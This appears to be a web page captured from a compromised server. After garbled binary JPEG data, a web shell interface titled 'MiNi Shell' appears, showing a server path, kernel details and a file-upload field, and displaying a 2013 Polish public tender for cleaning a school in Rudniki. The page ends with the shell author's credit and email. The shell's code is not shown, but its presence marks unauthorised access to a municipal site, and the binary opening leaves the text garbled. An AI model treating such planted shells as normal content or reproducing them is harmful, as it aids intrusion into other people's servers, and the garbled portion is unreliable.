JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130315/105026-N-2013.html

<p class="kh_header"><b>Rudniki: Kompleksowa usługa sprzątania budynku szkoły Gimnazjum Publicznego w Rudnikach im. Andrzeja Wajdy oraz terenu wokół szkoły.</b><br>
<b>Numer ogłoszenia: 105026 - 2013; data zamieszczenia: 15.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Obsługi Oświaty Samorządowej , ul. Wieluńska 15, 46-325 Rudniki, woj. opolskie, tel. 0-34 359 50 22, faks 0-34 359 50 22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budzetowa gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa usługa sprzątania budynku szkoły Gimnazjum Publicznego w Rudnikach im. Andrzeja Wajdy oraz terenu wokół szkoły..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa usługa sprzątania budynku szkoły Gimnazjum Publicznego w Rudnikach im. Andrzeja Wajdy oraz terenu wokół szkoły.
1.	Informacja ogólne:
1)	Łączna powierzchnia wewnętrzna pomieszczeń wynosi: 3380,01 m2 (plus 163,35 m2  trybuny zewnętrzne  i 163,35 m2 powierzchnia pod trybunami przy wschodniej ścianie sali gimnastycznej S1) - szczegółowe informacje co do powierzchni i rodzajów podłóg wyszczególniono w Tabeli nr 1 w zał. nr 4 do SIWZ 
2)	Łączna powierzchnia zewnętrzna do sprzątania - w tym tereny zielone, chodniki, chodnik wzdłuż drogi krajowej nr 43,  parkingi, schody, opaski przybudynkowe, placu zabaw  wynosi 9.409m2 - szczegółowe informacje co do terenu zewnętrznego objętego przedmiotem zamówienia określa mapka sytuacyjna (załącznik nr 4a do SIWZ) - obszar obrysowany linią koloru czerwonego (z wyłączeniem boisk Orlik). 
3)	Usługa sprzątania powinna być świadczona w dni nauki szkolnej w godzinach  od 1600  do  2000 (wyjątek - Tabela nr 1 poz. 30 i poz. 33 w zał. nr 4 do SIWZ ).          Wszelkie odstępstwa od tej zasady każdorazowo muszą być uzgadniane z dyrektorem szkoły. 
4)	Usługa sprzątania w miesiącu sierpniu musi być świadczona w terminie i w godzinach uzgodnionych wcześniej z dyrektorem szkoły. 
5)	Wykonawca zobowiązany jest do zapewnienia środków i sprzętu niezbędnego do realizacji usług. Stosowane przez Wykonawcę środki myjąco-czyszczące muszą posiadać aktualne atesty i certyfikaty dopuszczające je do stosowania na rynku polskim lub inne dokumenty potwierdzające stosowanie rozwiązań równoważnych. Wykonawca zobowiązany jest również do wyposażenia pracowników w odpowiednią odzież i obuwie ochronne.
6)	Wykonawca zobowiązany jest do zapewnienia takiej ilości osób sprzątających, aby zapewnić rzetelność i wysoką jakość wykonywanej usługi.
7)	Zamawiający zobowiązuje się nieodpłatnie udostępnić Wykonawcy miejsce do przechowywania sprzętu i środków związanych z bieżącą realizacją umowy. 
8)	Wykonawca może nieodpłatnie korzystać z wody i energii elektrycznej Zamawiającego na potrzeby wykonania przedmiotu zamówienia..
9)	Papier toaletowy oraz mydło w dozownikach w toaletach zapewnia i uzupełnia Zamawiający.
10)	Zamawiający zastrzega sobie możliwość codziennej oceny i okresowej kontroli usługi będącej przedmiotem zamówienia. W związku z tym Wykonawca zobowiązany jest do stawiennictwa w budynku w określonym terminie w celu przeprowadzenia wspólnej kontroli. Dopuszczalne formy powiadomienia Wykonawcy o wyznaczonym miejscu i czasie: telefonicznie, faksem, pisemnie.
11)	Do sprzątania zabrania się używania octu i preparatów na jego bazie, a względem powierzchni zewnętrznych - soli.
12)	Mycie mebli powinno odbywać się z użyciem środków do pielęgnacji i konserwacji mebli.
13)	Odkurzanie, czyszczenie, mycie sprzętu komputerowego i innego sprzętu elektronicznego musi być prowadzone urządzeniami i środkami do tego przeznaczonymi.
14)	Mycie powierzchni białych tablic interaktywnych zapewni Zamawiający.
15)	Osoby, którymi będzie posługiwał się Wykonawca, przed przystąpieniem do świadczenia usług muszą zostać przeszkolone  w szczególności w zakresie bezpieczeństwa i higieny pracy, a także przepisów pożarowych. Szkolenie Wykonawca przeprowadzi własnym staraniem i na własny koszt.
16)	Obowiązkiem Wykonawcy będzie umożliwienie stałego kontaktu z dyrektorem szkoły w celu bieżących uzgodnień dotyczących usług sprzątania. 
17)	Obowiązkiem Wykonawcy będzie przekazania dyrektorowi szkoły listy osób (imię, nazwisko, PESEL, adres zamieszkania, telefon kontaktowy), które będą wykonywać usługę sprzątania. W przypadku zmiany osoby sprzątającej, czy też zapewnienia zastępstwa na czas jej nieobecności Wykonawca musi nawiązać niezwłocznie kontakt z dyrektorem szkoły i powiadomić go o tym fakcie. 
18)	Zamawiający zapewni Wykonawcy dostęp do pomieszczeń objętych usługą sprzątania w terminach i godzinach określonych w pkt 3) i 4). 
19)	Wykonawca zobowiązany jest do bezzwłocznego poinformowania dyrektora szkoły o wszelkich, dostrzeżonych w czasie sprzątania obiektu, awariach i uszkodzeniach w pomieszczeniach oraz w wyposażeniu obiektu.
20)	Wykonawca odpowiada za wszelkie szkody poniesione przez Zamawiającego powstałe na skutek nie wykonania lub nienależytego wykonania przedmiotu zamówienia - do pełnej wysokości szkody.
2.	Sprzątanie powierzchni wewnętrznych:
CZĘSTOTLIWOŚĆ WYKONYWANIA POSZCZEGÓLNYCH CZYNNOŚCI W POSZCZEGÓLNYCH POMIESZCZENIACH SZKOŁY OKREŚLA TABELA NR 1 w zał. nr 4 do SIWZ. 
a)	Utrzymanie czystości we wszystkich pomieszczeniach,
b)	Zamiatanie, zmywanie, polerowanie podłóg, usuwanie przyklejonych gum do żucia,
c)	Odkurzanie wykładzin dywanowych, dywanów,
d)	Wycierania z kurzu wszystkich mebli, parapetów, opraw oświetleniowych, gniazd elektrycznych, wyłączników oświetlenia, gniazd komputerowych, likwidowanie pajęczyn,
e)	Wyrzucanie śmieci z koszy do pojemników do tego przystosowanych. Kosze na śmieci na terenie szkoły muszą być wyposażone w foliowe worki jednorazowe. Kosze na śmieci muszą być myte w zależności od potrzeb, ale nie rzadziej niż raz na dwa tygodnie,
f)	Mycie zlewozmywaków i urządzeń o podobnym przeznaczeniu,
g)	Wycierania drzwi i płytek naściennych,
h)	Utrzymanie czystości w WC, łazienkach - w tym mycie ich całego wyposażenia,
i)	Dezynfekcja muszli klozetowych i pisuarów środkami do tego przeznaczonymi,
j)	Mycie wyposażenia WC i łazienek powinno odbywać się z użyciem środków odkażających usuwających kamień,
k)	Podłogi w pomieszczeniach sanitarnych winny być sprzątane zawsze na mokro z użyciem płynu antypoślizgowego,
l)	Posadzki gresowe, lastrykowe, parkietowe powinny być zamiatane, myte przy użyciu środków nie niszczących powierzchni i nie powodujących ich śliskości, nadających połysk oraz powlekane odpowiednim do danej powierzchni środkiem konserwującym,
m)	Wycieranie kurzu z powierzchni ławek, krzeseł, biurek, szaf, szafek, stołów, półek, gablot, gaśnic, tablic  i innego sprzętu oraz parapetów okiennych, pulpitów, kratek wentylacyjnych przy użyciu środków czyszczących antystatycznych, bezzapachowych lub o delikatnym zapachu naturalnym, odpowiednim dla rodzaju powierzchni (drewno, tworzywo sztuczne) wyłącznie do tego przeznaczonymi środkami,
n)	Wycierania z kurzu ścian i sufitów (co najmniej dwa razy w roku)
o)	Usuwanie pajęczyn ze ścian i sufitów,
p)	Mycie drzwi wejściowych do budynku, czyszczenia wycieraczek,
q)	Mycie drzwi wewnętrznych,
r)	Ścieranie i mycie tablic białych/magnetycznych,
s)	Mycie i odkurzanie występów ściennych (cokoły, gzymsy, listwy przypodłogowe),
t)	Odkurzanie, czyszczenie, mycie poręczy schodowych,
u)	Odkurzanie i mycie kaloryferów,
v)	Usuwanie bieżących zabrudzeń ścian (wewnątrz i na zewnątrz budynku) możliwych do usunięcia,
w)	Mycie okien i ram okiennych (z użyciem sprzętu umożliwiającego prace na wysokościach)
x)	Opróżnianie niszczarek,
y)	Mycie i dezynfekcja aparatów telefonicznych,
z)	Czyszczenie i odkurzanie sprzętu komputerowego i urządzeń biurowych IT,
aa)	Czyszczenie i odkurzanie monitorów za pomocą materiałów nie pozostawiających smug, z wykorzystaniem środków przeznaczonych do czyszczenia monitorów,
3.	Sprzątanie powierzchni zewnętrznych:
Do zakresu obowiązków Wykonawcy należeć będzie:
a)	Dokładne sprzątanie terenu zewnętrznego (trawników, chodników, parkingów, placu zabaw) powinno odbywać się dwa razy w tygodniu - w poniedziałki i w piątki,
b)	Raz w tygodniu mycie na mokro wszystkich urządzeń placu zabaw oraz ławek zainstalowanych na terenie objętym usługa sprzątania,
c)	Grabienie i wywożenie na bieżąco liści i gałęzi - w zależności od potrzeb,
d)	Opróżnianie koszy na śmieci znajdujących się na zewnątrz,
e)	Usuwanie roślinności, mchu ze szczelin pomiędzy kostka brukową oraz pomiędzy płytami chodnikowymi, usuwanie zabrudzeń i przyklejonych gum do żucia na terenie określonym pkt 1. 2), (załącznik 4a do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.93.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału w postępowaniu będzie dokonana wg zasady spełnia/nie spełnia na podstawie: 
- oświadczenia o spełnieniu warunków udziału  w postępowaniu złożonego przez  
  Wykonawcę wg załącznika 2a,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału w postępowaniu będzie dokonana wg zasady spełnia/nie spełnia na podstawie: 
- oświadczenia o spełnieniu warunków udziału  w postępowaniu złożonego przez  
  Wykonawcę wg załącznika 2a,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału w postępowaniu będzie dokonana wg zasady spełnia/nie spełnia na podstawie: 
- oświadczenia o spełnieniu warunków udziału  w postępowaniu złożonego przez  
  Wykonawcę wg załącznika 2a,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału w postępowaniu będzie dokonana wg zasady spełnia/nie spełnia na podstawie: 
- oświadczenia o spełnieniu warunków udziału  w postępowaniu złożonego przez  
  Wykonawcę wg załącznika 2a,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału  w postępowaniu będzie dokonana wg zasady spełnia/nie spełnia na podstawie: 
- oświadczenia o spełnieniu warunków udziału  w postępowaniu złożonego przez  
  Wykonawcę wg załącznika 2a,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony Formularz oferty (zał. Nr 1 do SIWZ)
b)	Upoważnienie osób podpisujących ofertę musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy ( odpis z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie
c)	W przypadku przynależności do grupy kapitałowej Wykonawca składa wraz z ofertą listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1	Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadku:
a)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa, pod warunkiem, że będzie  dotyczyć zakresu mającego wpływ na realizację przedmiotu zamówienia,
b)	 gdy wynikną niejasności lub rozbieżności w umowie, których nie można usunąć w inny sposób,  a zmiana będzie umożliwiać  usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
c)	gdy na etapie postępowania  jak i w chwili zawarcia umowy nie  można było przewidzieć pozostałych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Obsługi Oświaty Samorządowej, ul. Wieluńska 15, 46-325 Rudniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 09:00, miejsce: Biuro Obsługi Oświaty Samorządowej, ul. Wieluńska 15, 46-325 Rudniki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com